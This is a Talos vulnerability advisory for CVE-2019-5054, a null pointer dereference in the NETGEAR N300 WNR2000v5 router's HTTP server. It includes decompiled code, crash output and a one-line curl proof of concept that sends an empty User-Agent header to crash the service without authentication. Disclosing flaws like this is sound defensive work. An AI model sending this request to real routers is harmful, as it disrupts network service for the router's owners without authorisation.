Talos Vulnerability Report

TALOS-2019-0831

NETGEAR N300 WNR2000v5 unauthenticated HTTP denial-of-service vulnerability

September 9, 2019
CVE Number

CVE-2019-5054

Summary

An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.

Tested Versions

NETGEAR N300 WNR2000v5 Firmware Version V1.0.0.70

Product URLs

https://www.netgear.com/support/product/WNR2000v5

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476: NULL Pointer Dereference

Details

The NETGEAR n300 is a small, affordable wireless router with minimal features.

Each HTTP request made to the HTTP daemon populates the following structure located at the hard-coded address 0x4cabb0:

struct http_request { char method[8]; float version; char url[256]; char headerbuf[4096]; char *authorization; char *host; char *accept; char *accept_charset; char *accept_encoding; char *accept_language; char *connection; char *cookie; char *referer; char *user_agent; char *content_type; char *content_length; char *soapaction; }

When attempting to connect to a page that requires authentication, the function do_auth_check() calls another function called send_authenticate(). This function contains a section of code that concatenates the received User-Agent to the end of the client IP address (after it is converted to a string). This string is then supposed to be compared against the contents of the file “/tmp/AUTH_login_browser” which should contain the IP Address and User-Agent of the previously authenticated client.

The problem is when req->userAgent doesn’t get populated — there isn’t a check against this. This results in a NULL pointer dereference and crashes the service:

agent = sa_straddr(&peeraddr); // Convert binary IP address to a string at 0x4b1c98
strcpy(curBrowser,agent);      // Copy string
strcat(curBrowser,req.user_agent); // Append req->user_agent to IP address

[Annotated Disassembly / Decompilation output]

0x4097f8 <send_authenticate+412>:	lw	a1,4400(s5)   // req->user_agent
0x4097fc <send_authenticate+416>:	lw	t9,-31484(gp) // load address of strcat()
0x409800 <send_authenticate+420>:	jalr	t9          // crash @ call strcat(curBrowser, agent)
0x409804 <send_authenticate+424>:	move	a0,s0       // client IP address string

Crash Information

   0x2ab59f88:	bnez	v0,0x2ab59f84
   0x2ab59f8c:	addiu	v1,v1,1
   0x2ab59f90:	addiu	v1,v1,-2
=> 0x2ab59f94:	lb	v0,0(a1)        // $a1 == 0x00
   0x2ab59f98:	addiu	v1,v1,1
   0x2ab59f9c:	addiu	a1,a1,1
   0x2ab59fa0:	bnez	v0,0x2ab59f94
   0x2ab59fa4:	sb	v0,0(v1)

Stopped reason: SIGSEGV
0x2ab59f94 in ?? ()

peda-mips > x/32xw $a1
0x0:	Cannot access memory at address 0x0

Exploit Proof of Concept

$ curl -H 'User-Agent:' http://192.168.1.1/UPG_upgrade.htm

Timeline

2019-05-08 - Vendor Disclosure
2019-09-09- Public Release

Credit

Discovered by Dave McDaniel of Cisco Talos.